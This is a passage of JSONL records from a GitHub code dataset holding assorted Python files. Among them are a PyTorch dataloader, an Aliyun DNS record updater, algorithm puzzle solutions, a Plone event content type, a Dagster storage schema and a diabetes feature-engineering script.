0.406],\n std=[0.229, 0.224, 0.225])\n ]\n )\n \n use_cuda = torch.cuda.is_available()\n kwargs = {'num_workers': 4, 'pin_memory': True} if use_cuda else {}\n train_dataset = datasets.ImageFolder(root=train_dir, transform=train_transforms)\n train_loader = torch.utils.data.DataLoader(train_dataset, batch_size=batch_size, shuffle=True, **kwargs)\n test_dataset = datasets.ImageFolder(root=test_dir, transform=test_transforms)\n test_loader = torch.utils.data.DataLoader(test_dataset, batch_size=batch_size, shuffle=False, **kwargs) \n return train_loader, test_loader","repo_name":"VietHung-CHV/Emotion_Recognition","sub_path":"src/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42633144202","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport json\nfrom urllib import request\nfrom aliyunsdkcore.client import AcsClient\nfrom aliyunsdkcore.acs_exception.exceptions import ClientException\nfrom aliyunsdkcore.acs_exception.exceptions import ServerException\nfrom aliyunsdkalidns.request.v20150109 import DescribeDomainRecordsRequest\nfrom aliyunsdkalidns.request.v20150109 import UpdateDomainRecordRequest\nimport LibWaakii.IpInfo as IpInfo\nfrom LibWaakii import WordsCheck\n\nclass DNSWorker(object):\n # 阿里云Access_Key_Id和Access_Key_Secret\n access_key_id = \"\"\n access_key_secret = \"\"\n region_id = \"\"\n # 当前操作域名\n domain_name = \"\"\n\n # 解析记录类型,一般为A记录\n record_type = \"A\"\n # 配置文件路径文件名\n config_file = \"\"\n\n client = None\n record = None\n current_ip = ''\n\n # 初始化,获取client实例\n def __init__(self,domain_name,access_key_id,access_key_secret,region_id = 'region_id'):\n self.access_key_id = access_key_id\n self.access_key_secret = access_key_secret\n self.region_id = region_id\n self.domain_name = domain_name\n \n try:\n self.client = AcsClient(\n self.access_key_id,\n self.access_key_secret,\n self.region_id\n )\n self.record = self.getAliyunDnsRecord()\n except Exception as e:\n print(e)\n self.record = None\n\n def getAliyunDnsRecord(self):\n try:\n request = DescribeDomainRecordsRequest.DescribeDomainRecordsRequest()\n request.set_PageSize(99)\n request.set_PageNumber(1)\n request.set_action_name(\"DescribeDomainRecords\")\n request.set_DomainName(self.domain_name)\n # request.set_RRKeyWord(self.rr_keyword)\n request.set_TypeKeyWord(self.record_type)\n r = self.client.do_action_with_exception(request)\n return json.loads(r.decode('utf-8'))\n except Exception as e:\n print(e)\n return None\n\n # 获取阿里云域名解析记录ID\n def get_record_all(self) :\n if self.record != None:\n return self.record[\"DomainRecords\"][\"Record\"]\n else:\n return None\n\n # 获取域名解析记录详细信息\n def get_record_value(self,RR = '@') :\n try:\n for dicRecord in self.record[\"DomainRecords\"][\"Record\"]:\n if RR == dicRecord['RR']:\n return dicRecord\n return {}\n except:\n return None\n\n # 获取域名解析记录recordid\n def get_record_id(self,RR = '@') :\n\n try:\n return self.get_record_value(RR)['RecordId']\n except:\n return None\n \n # 修改阿里云解析记录\n def update_record(self, RR ,value):\n request = UpdateDomainRecordRequest.UpdateDomainRecordRequest()\n request.set_action_name(\"UpdateDomainRecord\")\n request.set_accept_format('json')\n request.set_TTL('600')\n sRecordid = self.get_record_id(RR)\n\n if sRecordid != None and WordsCheck.RegexChecker.judgeLegalIpv4(value):\n request.set_RecordId(sRecordid)\n request.set_Type(self.record_type)\n request.set_RR(RR)\n request.set_Value(value)\n else:\n return False\n pass\n try:\n # jsonReturn = json.load(self.client.do_action_with_exception(request))\n # rc = self.client.do_action_with_exception(request)\n if None != json.loads(self.client.do_action_with_exception(request).decode('utf-8')):\n return True\n except:\n return False\n \n","repo_name":"jeffreyshou7/Py-AliyunDDNS-Service","sub_path":"LibWaakii/AliYunDns.py","file_name":"AliYunDns.py","file_ext":"py","file_size_in_byte":3713,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"} +{"seq_id":"73030005929","text":"import sys\ninput = sys.stdin.readline\n\nn, c = map(int, input().split())\narr = [int(input()) for _ in range(n)]\narr.sort()\n\nlow, high = 1, arr[-1] - arr[0]\nmid = 0\nresult = 0\n\nwhile low <= high:\n mid = (low+high) // 2\n idx = 0\n cnt = 1\n for i in range(1, len(arr)):\n if arr[i] >= arr[idx] + mid:\n cnt += 1\n idx = i\n if cnt >= c:\n result = mid\n low = mid + 1\n else:\n high = mid - 1\n\nprint(result)\n","repo_name":"CHOSIYEON/Algorithms","sub_path":"BAEKJOON/Binary Search/record/2110.py","file_name":"2110.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23217829856","text":"# 출처: https://www.acmicpc.net/problem/17389\n# 문제: 보너스 점수\n\n\n_ = input()\n\nbonus = 0\nresult = 0\nfor i, ox in enumerate(input()):\n if ox == \"O\":\n result += i + 1 + bonus\n bonus += 1\n else:\n bonus = 0\n\nprint(result)\n","repo_name":"mozzieongit/Bike-Project","sub_path":"boj/prob17389.py","file_name":"prob17389.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29910627754","text":"# -*- coding: utf-8 -*-\n# $Id: event.py 388 2009-06-13 09:32:31Z ajung $\n\n\n\nfrom AccessControl import ClassSecurityInfo\nfrom zope.interface import implements\n\nfrom DateTime.DateTime import DateTime\nfrom Products.ATContentTypes.content.event import ATEvent\nfrom Products.ATContentTypes.content.schemata import finalizeATCTSchema\nfrom Products.DataGridField import DataGridField, DataGridWidget\nfrom Products.DataGridField.Column import Column\nfrom Products.DataGridField.SelectColumn import SelectColumn\nfrom Products.DataGridField.CheckboxColumn import CheckboxColumn\n\nfrom Products.CMFCore.permissions import View\nfrom archetypes.referencebrowserwidget.widget import ReferenceBrowserWidget\nfrom dateutil.rrule import YEARLY, MONTHLY, WEEKLY, DAILY\n\nfrom vs.event.config import *\nfrom vs.event.interfaces import IVSEvent, IVSSubEvent\nfrom vs.event import MessageFactory as _\nfrom vs.event import validators\nfrom collective.calendarwidget.widget import CalendarWidget\nimport event_util\n\ntry:\n from Products.LinguaPlone import public as atapi\nexcept ImportError:\n from Products.Archetypes import atapi\n\n\nfrom logging import getLogger\nlog = getLogger(\">> event : \")\n\nVSEventSchema = atapi.Schema((\n\n atapi.ReferenceField(\n name='subEvents',\n allowed_types=('VSSubEvent',),\n multiValued=True,\n relationship='isSubEvent',\n widget=ReferenceBrowserWidget(\n visible={'view': 'invisible', 'edit':'invisible'},\n ),\n ),\n atapi.LinesField(\n name='weekdays',\n schemata='recurrence',\n vocabulary=atapi.DisplayList((\n ('0', _(u'vs_label_mo', 'Monday')),\n ('1', _(u'vs_label_di', 'Tuesday')),\n ('2', _(u'vs_label_mi', 'Wednesday')),\n ('3', _(u'vs_label_do', 'Thursday')),\n ('4', _(u'vs_label_fr', 'Friday')),\n ('5', _(u'vs_label_sa', 'Saturday')),\n ('6', _(u'vs_label_so', 'Sunday'))\n )),\n widget=atapi.MultiSelectionWidget(\n format=\"checkbox\",\n label=_(u'vs_event_label_weekdays', 'Weekdays'),\n description=_(u'vs_event_help_weekdays', 'Select weekdays'),\n ),\n ),\n atapi.StringField(\n name='bysetpos',\n schemata='recurrence',\n validators=('isLineOfInts',),\n widget=atapi.StringWidget(\n label=_(u'vs_event_label_bysetpos', 'Occurrence'),\n description=_(u'vs_event_help_bysetpos', 'Comma separated list of '\n 'numbers. If this event is on first and third '\n 'Monday of the month, enter \"1,3\" and select '\n 'appropriate day of the week above. For the last '\n 'day of the month, enter \"-1\", select Monday '\n 'through Friday above and monthly recurrence.'),\n ),\n ),\n atapi.LinesField(\n name='exceptions',\n schemata='recurrence',\n validators=('linesOfDates',),\n widget=atapi.LinesWidget(\n label=_(u'vs_event_label_exceptions', 'Exceptions'),\n description=_(u'vs_event_help_exceptions', 'Please enter exceptions to recurrence. One date per line in format YYYY-MM-DD'),\n ),\n ),\n\n atapi.IntegerField('frequency',\n schemata=\"recurrence\",\n required=True,\n i18n_domain = \"vs.event\",\n vocabulary={str(-1): _(u'Does not repeat'),\n str(YEARLY): _(u'Yearly'),\n str(MONTHLY): _(u'Monthly'),\n str(WEEKLY): _(u'Weekly'),\n str(DAILY): _(u'Daily'),\n }.items(),\n default=-1,\n widget=atapi.SelectionWidget(label=_(u\"vs_event_label_frequency\", 'Frequency'),\n )\n ),\n atapi.IntegerField('interval',\n schemata=\"recurrence\",\n required=True,\n default=1,\n widget=atapi.IntegerWidget(label=_(u\"vs_event_label_interval\", 'Interval'),\n )\n ),\n atapi.DateTimeField('until',\n schemata=\"recurrence\",\n widget=CalendarWidget(label=_(u\"vs_event_label_repeat_until\", \"Repeat until\"),\n description=_(u\"vs_event_description_repeat__until\", \"Event repeats until this date.\"),\n with_time=1)\n ),\n atapi.IntegerField('count',\n schemata=\"recurrence\",\n widget=atapi.IntegerWidget(label=_(u\"vs_event_label_count\", 'Count'),\n description=_(u\"vs_event_description_count\", \"Maxinum number of times the event repeats\"),\n )\n ),\n\n))\n\nVSEventSchema = VSEventSchema + ATEvent.schema.copy()\nfinalizeATCTSchema(VSEventSchema, folderish=False, moveDiscussion=True)\n\n\ndef modifyEventSchema(schema):\n schema.addField(atapi.BooleanField('wholeDay',\n widget=atapi.BooleanWidget(\n label=_(u'label_whole_day_event', 'Whole day event'),\n ),\n ))\n schema.addField(atapi.BooleanField('useEndDate',\n default=True,\n widget=atapi.BooleanWidget(\n label=_(u'label_use_end_date', 'Use end date?'),\n ),\n ))\n schema.moveField('wholeDay', before='startDate')\n schema.moveField('useEndDate', after='wholeDay')\n schema['startDate'].widget = CalendarWidget(label=_(u\"label_event_start\", \"Event Starts\"),\n with_time=1,\n with_popup=1,\n js_shortcuts=0,\n ignore_unset_time=1)\n\n schema['endDate'].widget = CalendarWidget(label = _(u\"label_event_end\", \"Event Ends\"),\n with_time=1,\n with_popup=1,\n js_shortcuts=0,\n ignore_unset_time=1)\n\n del schema['until']\n schema.addField(atapi.DateTimeField('until',\n schemata='recurrence',\n widget=CalendarWidget(description=_(u\"vs_repeat_events_until_date\", \"Event repeats until this date\"),\n label=_(u\"vs_label_repeat_until\", \"Repeat until\"),\n with_time=1)))\n\n schema.addField(atapi.ReferenceField(name='attachments',\n allowed_types=('Link','File'),\n multiValued=1,\n relationship='aAttachment',\n widget=ReferenceBrowserWidget(\n show_review_state=1,\n allow_sorting=1,\n force_close_on_insert=1,\n base_query = {'Type':['Link','File']},\n label=_(u'vs_event_label_attachments', 'Attachments'),\n ),\n ))\n\n del schema['attendees']\n schema.addField(DataGridField(name=\"attendees\",\n columns=('name', 'mail','role', 'show'),\n schemata='attendees',\n widget = DataGridWidget(\n label=_(u'vs_event_label_roleAttendees', \"Attendees and roles\"),\n columns={\n 'name': Column(_(u'vs_event_label_nameColumn', \"Name\")),\n 'mail': Column(_(u'vs_event_label_mailColumn', \"e-Mail\")),\n 'role': SelectColumn(_(u'vs_event_label_roleColumn', \"Role\"), vocabulary='getAttendeeRoles'),\n 'show': CheckboxColumn(_(u'vs_event_label_showColumn', \"Show\")),\n }),\n ))\n schema.moveField('attendees', after='count')\n return schema\n\nclass VSEvent(ATEvent):\n \"\"\" vs.event \"\"\"\n\n security = ClassSecurityInfo()\n implements(IVSEvent)\n meta_type = 'VSEvent'\n _at_rename_after_creation = True\n schema = modifyEventSchema(VSEventSchema)\n\n security.declareProtected(View, 'getICal')\n def getICal(self):\n \"\"\"get iCal data \"\"\"\n return event_util.getICal(self)\n\n security.declareProtected(View, 'getVCal')\n def getVCal(self):\n \"\"\"get VCal data \"\"\"\n return event_util.getVCal(self)\n\n\n def at_post_edit_script(self):\n \"\"\" Ensure that for single-day dates without an end date\n the end date is equal to the start date.\n \"\"\"\n\n self.setExcludeFromNav(True)\n\n if not self.getUseEndDate():\n self.setEndDate(self.start())\n\n if self.getWholeDay():\n self.setStartDate(DateTime(self.start().strftime('%Y/%m/%d 00:00:00')))\n self.setEndDate(DateTime(self.end().strftime('%Y/%m/%d 23:59:00')))\n\n def getAttendeeRoles(self):\n \"\"\" \"\"\"\n return atapi.DisplayList((\n ('chair',_(u'vs_event_label_chair', \"Chair\")),\n ('observer',_(u'vs_event_label_observer', \"Observer\")),\n ('participant',_(u'vs_event_label_participant', \"Participant\")),\n ('opt_participant',_(u'vs_event_label_opt_participant', \"Optional participant\")),\n ))\n\n security.declareProtected(View, 'post_validate')\n def post_validate(self, REQUEST=None, errors=None):\n \"\"\" Trigger original ATEvent.post_validate_method() for\n dates having an end date.\n \"\"\"\n if REQUEST.get('useEndDate', True) == True:\n return super(VSEvent, self).post_validate(REQUEST=REQUEST,\n errors=errors)\n\natapi.registerType(VSEvent, PROJECTNAME)\n\n\ndef modifySubEventSchema(schema):\n # remove unwanted fields for subevents\n\n # PLONE 4 seems not to have a eventType field anymore, so it must be\n # excluded here for compatibility\n for id in ('attendees', 'contactName', 'contactEmail', 'contactPhone', 'eventUrl'):\n schema[id].widget.visible = False\n for field in schema.fields():\n if field.schemata in ('dates', 'categorization', 'ownership', 'settings'):\n field.widget.visible = False\n\n schema.addField(atapi.BooleanField('wholeDay',\n default=False,\n widget=atapi.BooleanWidget(\n label=_(u'label_whole_day_event', 'Whole day event'),\n ),\n ))\n schema.addField(atapi.BooleanField('useEndDate',\n default=True,\n widget=atapi.BooleanWidget(\n label=_(u'label_use_end_date', 'Use end date?'),\n ),\n ))\n schema.moveField('wholeDay', before='startDate')\n schema.moveField('useEndDate', after='wholeDay')\n\n schema['startDate'].widget = CalendarWidget(label=_(u\"label_event_start\", \"Event Starts\"),\n with_time=1,\n with_popup=1,\n js_shortcuts=0,\n ignore_unset_time=1)\n\n schema['endDate'].widget = CalendarWidget(label = _(u\"label_event_end\", \"Event Ends\"),\n with_time=1,\n with_popup=1,\n js_shortcuts=0,\n ignore_unset_time=1)\n\n return schema\n\nVSSubEventSchema = ATEvent.schema.copy()\nfinalizeATCTSchema(VSSubEventSchema, folderish=False, moveDiscussion=True)\n\nclass VSSubEvent(VSEvent):\n \"\"\" vs.event \"\"\"\n\n implements(IVSSubEvent)\n meta_type = 'VSSubEvent'\n schema = modifySubEventSchema(VSSubEventSchema)\n\natapi.registerType(VSSubEvent, PROJECTNAME)\n","repo_name":"collective/vs.event","sub_path":"vs/event/content/event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":12580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37289889666","text":"# Question 55 Question Write a program which accepts a sequence of words separated by whitespace as input to print\n# the words composed of digits only. Example: If the following words is given as input to the program: 2 cats and 3\n# dogs. Then, the output of the program should be: ['2', '3'] In case of input data being supplied to the question,\n# it should be assumed to be a console input. Hints Use re.findall() to find all substring using regex.\n\nfrom re import findall\n\n\ndef only_digits(text):\n\tnumbers = findall('[0-9]+', text)\n\tprint(numbers)\n\n\nl = '2 cats and 3 dogs'\nonly_digits(l)\n\n# bez sensu, bo findall wyszukuje w całym tekście, więc jakby było d0gs, to by w liście było też '0'\n","repo_name":"faellie182/Nauka-pythona","sub_path":"breaking_the_ice_with_python/55_str_with_digits_only.py","file_name":"55_str_with_digits_only.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2134952060","text":"# A robot moves in a plane starting from the original point (0,0). The robot can move toward UP, DOWN, LEFT and RIGHT with a given steps.\n# The trace of robot movement is shown as the following:\n# The numbers after the direction are steps.\n# Please write a program to compute the distance from current position after a sequence of movement and original point.\n# Example: If the following tuples are given as input to the program:\n# UP 5\n# DOWN 3\n# LEFT 3\n# RIGHT 2\n\n# Then, the output of the program should be: 2.23606\n\n\n\nimport math\npos = [0,0]\n\nwhile True:\n s = input()\n\n if len(s) == 0:\n break\n activity = s.split(\" \")\n\n direction = activity[0]\n steps_taken = int(activity[1])\n\n if direction == 'UP':\n pos[0] += steps_taken\n elif direction == 'DOWN':\n pos[0] -= steps_taken\n elif direction == 'LEFT':\n pos[1] -= steps_taken\n elif direction == 'RIGHT':\n pos[1] += steps_taken\n else:\n pass\n\nprint(pos)\n\nprint(math.sqrt(pos[0]**2 + pos[1]**2))","repo_name":"csumithra/pythonUtils","sub_path":"21_compute_distance.py","file_name":"21_compute_distance.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9888535427","text":"import sqlalchemy as db\nfrom sqlalchemy.dialects import sqlite\n\nfrom ..sql import MySQLCompatabilityTypes, get_current_timestamp\n\nScheduleStorageSqlMetadata = db.MetaData()\n\nJobTable = db.Table(\n \"jobs\",\n ScheduleStorageSqlMetadata,\n db.Column(\n \"id\",\n db.BigInteger().with_variant(sqlite.INTEGER(), \"sqlite\"),\n primary_key=True,\n autoincrement=True,\n ),\n db.Column(\"job_origin_id\", db.String(255), unique=True),\n db.Column(\"selector_id\", db.String(255)),\n db.Column(\"repository_origin_id\", db.String(255)),\n db.Column(\"status\", db.String(63)),\n db.Column(\"job_type\", db.String(63), index=True),\n db.Column(\"job_body\", db.Text),\n db.Column(\"create_timestamp\", db.DateTime, server_default=get_current_timestamp()),\n db.Column(\"update_timestamp\", db.DateTime, server_default=get_current_timestamp()),\n)\n\nInstigatorsTable = db.Table(\n \"instigators\",\n ScheduleStorageSqlMetadata,\n db.Column(\n \"id\",\n db.BigInteger().with_variant(sqlite.INTEGER(), \"sqlite\"),\n primary_key=True,\n autoincrement=True,\n ),\n db.Column(\"selector_id\", db.String(255), unique=True),\n db.Column(\"repository_selector_id\", db.String(255)),\n db.Column(\"status\", db.String(63)),\n db.Column(\"instigator_type\", db.String(63), index=True),\n db.Column(\"instigator_body\", db.Text),\n db.Column(\"create_timestamp\", db.DateTime, server_default=get_current_timestamp()),\n db.Column(\"update_timestamp\", db.DateTime, server_default=get_current_timestamp()),\n)\n\nJobTickTable = db.Table(\n \"job_ticks\",\n ScheduleStorageSqlMetadata,\n db.Column(\n \"id\",\n db.BigInteger().with_variant(sqlite.INTEGER(), \"sqlite\"),\n primary_key=True,\n autoincrement=True,\n ),\n db.Column(\"job_origin_id\", db.String(255), index=True),\n db.Column(\"selector_id\", db.String(255)),\n db.Column(\"status\", db.String(63)),\n db.Column(\"type\", db.String(63)),\n db.Column(\"timestamp\", db.types.TIMESTAMP),\n db.Column(\"tick_body\", db.Text),\n db.Column(\"create_timestamp\", db.DateTime, server_default=get_current_timestamp()),\n db.Column(\"update_timestamp\", db.DateTime, server_default=get_current_timestamp()),\n)\n\nAssetDaemonAssetEvaluationsTable = db.Table(\n \"asset_daemon_asset_evaluations\",\n ScheduleStorageSqlMetadata,\n db.Column(\n \"id\",\n db.BigInteger().with_variant(sqlite.INTEGER(), \"sqlite\"),\n primary_key=True,\n autoincrement=True,\n ),\n db.Column(\n \"evaluation_id\", db.BigInteger().with_variant(sqlite.INTEGER(), \"sqlite\"), index=True\n ),\n db.Column(\"asset_key\", db.Text),\n db.Column(\"asset_evaluation_body\", db.Text),\n db.Column(\"num_requested\", db.Integer),\n db.Column(\"num_skipped\", db.Integer),\n db.Column(\"num_discarded\", db.Integer),\n db.Column(\"create_timestamp\", db.DateTime, server_default=get_current_timestamp()),\n)\n\n\n# Secondary Index migration table, used to track data migrations, event_logs and runs.\n# This schema should match the schema in the event_log storage, run schema\nSecondaryIndexMigrationTable = db.Table(\n \"secondary_indexes\",\n ScheduleStorageSqlMetadata,\n db.Column(\n \"id\",\n db.BigInteger().with_variant(sqlite.INTEGER(), \"sqlite\"),\n primary_key=True,\n autoincrement=True,\n ),\n db.Column(\"name\", MySQLCompatabilityTypes.UniqueText, unique=True),\n db.Column(\"create_timestamp\", db.DateTime, server_default=get_current_timestamp()),\n db.Column(\"migration_completed\", db.DateTime),\n)\n\ndb.Index(\n \"idx_job_tick_status\",\n JobTickTable.c.job_origin_id,\n JobTickTable.c.status,\n mysql_length=32,\n)\ndb.Index(\"idx_job_tick_timestamp\", JobTickTable.c.job_origin_id, JobTickTable.c.timestamp)\ndb.Index(\"idx_tick_selector_timestamp\", JobTickTable.c.selector_id, JobTickTable.c.timestamp)\n\ndb.Index(\n \"idx_asset_daemon_asset_evaluations_asset_key_evaluation_id\",\n AssetDaemonAssetEvaluationsTable.c.asset_key,\n AssetDaemonAssetEvaluationsTable.c.evaluation_id,\n mysql_length={\"asset_key\": 64},\n unique=True,\n)\n","repo_name":"dagster-io/dagster","sub_path":"python_modules/dagster/dagster/_core/storage/schedules/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":4086,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"37034361186","text":"\"\"\"\r\nPregnancies = Hamile kalma sayısı\r\nGlucose = Glikoz\r\nBlood Pressure = Kan basıncı\r\nSkin Thickness = Deri kalınlığı\r\nInsulin = İnsülin\r\nBMI (Body Mass Index) = Beden kitle endeksi\r\nDiabetes Pedigree Function = Soyumuzdaki kişilere göre diyabet olma ihtimalimizi hesaplayan bir fonksiyon\r\nAge = Yaş\r\nOutcome = Diyabet olup olmadığı bilgisi\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport seaborn as sns\r\nfrom matplotlib import pyplot as plt\r\nimport missingno as msno\r\nimport os\r\nfrom sklearn.neighbors import LocalOutlierFactor\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nfrom sklearn import preprocessing\r\nfrom helpers.eda import grab_col_names\r\n\r\npd.pandas.set_option('display.max_columns', None)\r\npd.set_option('display.float_format', lambda x: '%.3f' % x)\r\npd.set_option('display.width', 170)\r\n\r\ndf = pd.read_csv(\"datasets/diabetes.csv\")\r\n\r\ndf.info()\r\ndf.isnull().sum()\r\n\r\ndf.describe().T\r\n\r\ndf[[\"Glucose\", \"BloodPressure\", \"SkinThickness\", \"Insulin\", \"BMI\"]] = \\\r\n df[[\"Glucose\", \"BloodPressure\", \"SkinThickness\", \"Insulin\", \"BMI\"]].replace(0, np.NaN)\r\n\r\n\r\ndef outlier_thresholds(dataframe, col_name):\r\n quartile1 = dataframe[col_name].quantile(0.25)\r\n quartile3 = dataframe[col_name].quantile(0.75)\r\n interquantile_range = quartile3 - quartile1\r\n up_limit = quartile3 + 1.5 * interquantile_range\r\n low_limit = quartile1 - 1.5 * interquantile_range\r\n return low_limit, up_limit\r\n\r\n\r\ndef check_outlier(dataframe, col_name):\r\n low_limit, up_limit = outlier_thresholds(dataframe, col_name)\r\n if dataframe[(dataframe[col_name] > up_limit) | (dataframe[col_name] < low_limit)].any(axis=None):\r\n return True\r\n else:\r\n return False\r\n\r\n\r\ncat_cols, cat_but_car, num_cols, num_but_cat = grab_col_names(df)\r\n\r\nfor col in num_cols:\r\n print(col, check_outlier(df, col))\r\n\r\n\r\ndef replace_with_thresholds(dataframe, col_name):\r\n low_limit, up_limit = outlier_thresholds(dataframe, col_name)\r\n if low_limit > 0:\r\n dataframe.loc[(dataframe[col_name] < low_limit), col_name] = low_limit\r\n dataframe.loc[(dataframe[col_name] > up_limit), col_name] = up_limit\r\n else:\r\n dataframe.loc[(dataframe[col_name] > up_limit), col_name] = up_limit\r\n\r\n\r\nfor col in num_cols:\r\n if col != \"Glucose\":\r\n replace_with_thresholds(df, col)\r\n\r\n# MISSING VALUES\r\ndf.isnull().sum()\r\n\r\n\r\ndef missing_values_table(dataframe, na_name=False):\r\n na_columns = [col for col in dataframe.columns if dataframe[col].isnull().sum() > 0]\r\n\r\n n_miss = dataframe[na_columns].isnull().sum().sort_values(ascending=False)\r\n\r\n ratio = (dataframe[na_columns].isnull().sum() / dataframe.shape[0] * 100).sort_values(ascending=False)\r\n\r\n missing_df = pd.concat([n_miss, np.round(ratio, 2)], axis=1, keys=['n_miss', 'ratio'])\r\n\r\n print(missing_df, end=\"\\n\")\r\n\r\n if na_name:\r\n return na_columns\r\n\r\n\r\nna_name = missing_values_table(df, na_name=True)\r\n\r\n\r\ndef missing_vs_target(dataframe, target, na_columns):\r\n temp_df = dataframe.copy()\r\n for col in na_columns:\r\n temp_df[col + '_NA_FLAG'] = np.where(temp_df[col].isnull(), 1, 0)\r\n na_flags = temp_df.loc[:, temp_df.columns.str.contains(\"_NA_\")].columns\r\n for col in na_flags:\r\n print(pd.DataFrame({\"TARGET_MEAN\": temp_df.groupby(col)[target].mean(),\r\n \"Count\": temp_df.groupby(col)[target].count()}), end=\"\\n\\n\\n\")\r\n\r\n\r\nmissing_vs_target(df, \"Outcome\", na_name)\r\n\r\ndf.pivot_table(df, index=[\"Outcome\"])\r\n\r\nfor col in df.columns:\r\n df.loc[(df[\"Outcome\"] == 0) & (df[col].isnull()), col] = df[df[\"Outcome\"] == 0][col].median()\r\n df.loc[(df[\"Outcome\"] == 1) & (df[col].isnull()), col] = df[df[\"Outcome\"] == 1][col].median()\r\n\r\n# FEATURE ENGINEERING\r\n\r\ndf.loc[(df[\"Age\"] < 18), \"NEW_AGE_CAT\"] = \"Young\"\r\ndf.loc[(df[\"Age\"] > 18) & (df[\"Age\"] < 56), \"NEW_AGE_CAT\"] = \"Mature\"\r\ndf.loc[(df[\"Age\"] > 56), \"NEW_AGE_CAT\"] = \"Old\"\r\n\r\ndf.loc[(df[\"BMI\"] < 18.5), \"NEW_BMI_CAT\"] = \"Underweight\"\r\ndf.loc[(df[\"BMI\"] > 18.5) & (df[\"BMI\"] < 25), \"NEW_BMI_CAT\"] = \"Normal\"\r\ndf.loc[(df[\"BMI\"] > 25) & (df[\"BMI\"] < 30), \"NEW_BMI_CAT\"] = \"Overweight\"\r\ndf.loc[(df[\"BMI\"] > 30) & (df[\"BMI\"] < 40), \"NEW_BMI_CAT\"] = \"Obese\"\r\ndf.loc[(df[\"BMI\"] > 40), \"NEW_BMI_CAT\"] = \"\tSevere Obese\"\r\n\r\ndf.loc[(df[\"Glucose\"] < 70), \"NEW_GLUCOSE_CAT\"] = \"Low\"\r\ndf.loc[(df[\"Glucose\"] > 70) & (df[\"Glucose\"] < 99), \"NEW_GLUCOSE_CAT\"] = \"Normal\"\r\ndf.loc[(df[\"Glucose\"] > 99) & (df[\"Glucose\"] < 126), \"NEW_GLUCOSE_CAT\"] = \"Secret\"\r\ndf.loc[(df[\"Glucose\"] > 126) & (df[\"Glucose\"] < 200), \"NEW_GLUCOSE_CAT\"] = \"High\"\r\n\r\ndf.loc[(df[\"BloodPressure\"] < 79), \"NEW_BLOODPRESSURE_CAT\"] = \"Normal\"\r\ndf.loc[(df[\"BloodPressure\"] > 79) & (df[\"BloodPressure\"] < 89), \"NEW_BLOODPRESSURE_CAT\"] = \"Hypertension_S1\"\r\ndf.loc[(df[\"BloodPressure\"] > 89) & (df[\"BloodPressure\"] < 123), \"NEW_BLOODPRESSURE_CAT\"] = \"Hypertension_S2\"\r\n\r\n\r\ndef set_insulin(row):\r\n if 16 <= row[\"Insulin\"] <= 166:\r\n return \"Normal\"\r\n else:\r\n return \"Abnormal\"\r\n\r\n\r\ndf[\"NEW_INSULIN_CAT\"] = df.apply(set_insulin, axis=1)\r\n\r\ndf.columns = [col.upper() for col in df.columns]\r\n\r\ndf.drop([\"BLOODPRESSURE\", \"GLUCOSE\", \"AGE\", \"BMI\", \"INSULIN\"], inplace=True, axis=1)\r\n\r\n\r\n# LABEL ENCODING\r\n\r\ndef label_encoder(dataframe, binary_col):\r\n labelencoder = preprocessing.LabelEncoder()\r\n dataframe[binary_col] = labelencoder.fit_transform(dataframe[binary_col].astype(str))\r\n return dataframe\r\n\r\n\r\nbinary_cols = [col for col in df.columns if df[col].dtypes == \"O\"\r\n and len(df[col].unique()) == 2]\r\n\r\nfor col in df.columns:\r\n label_encoder(df, col)\r\n\r\n\r\n# ONE-HOT ENCODING\r\n\r\ndef one_hot_encoder(dataframe, categorical_cols, drop_first=False):\r\n dataframe = pd.get_dummies(dataframe, columns=categorical_cols, drop_first=drop_first)\r\n return dataframe\r\n\r\n\r\nohe_cols = [col for col in df.columns if 10 >= len(df[col].unique()) > 2]\r\n\r\none_hot_encoder(df, ohe_cols, drop_first=True)\r\n\r\n# FEATURE SCALING\r\n\r\ntransformer = MinMaxScaler().fit(df[[\"DIABETESPEDIGREEFUNCTION\"]])\r\ndf[\"DIABETESPEDIGREEFUNCTION\"] = transformer.transform(df[[\"DIABETESPEDIGREEFUNCTION\"]])\r\n","repo_name":"serhatyazicioglu/Feature-Engineering","sub_path":"diabetes_feature_engineering.py","file_name":"diabetes_feature_engineering.py","file_ext":"py","file_size_in_byte":6104,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"72010190888","text":"from pathlib import Path\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport scipy\nfrom scipy import ndimage, fft\nfrom PIL import Image\n\n\n# ----------------------------------------------------- load image ---------------------------------------------\nfolder = os.path.join(os.getcwd(), 'Lab04/')\nfile_name = os.path.join(folder, 'blurred_image.jpg')\n\n# Open the image with pillow and convert to numpy array\nimage = Image.open(file_name)\ncolor_pixels = np.asarray(Image.open(file_name))\ngray_pixels = np.asarray(Image.open(file_name).convert('L'))\n\n# summarize some details about the image\nprint(image.format)\nprint('numpy array:', gray_pixels.dtype)\nprint(gray_pixels.shape)\n\n# -------------------------------------------- generate the motion blur filter -----------------------------------------\nnFilter = 91\nangle = 45\nmy_filter = np.zeros((nFilter, nFilter))\nmy_filter[nFilter//2, :] = 1.0 / nFilter\nmy_filter = scipy.ndimage.rotate(my_filter, angle, reshape=False)\n\nnRows = gray_pixels.shape[0]\nnCols = gray_pixels.shape[1]\nnFFT = 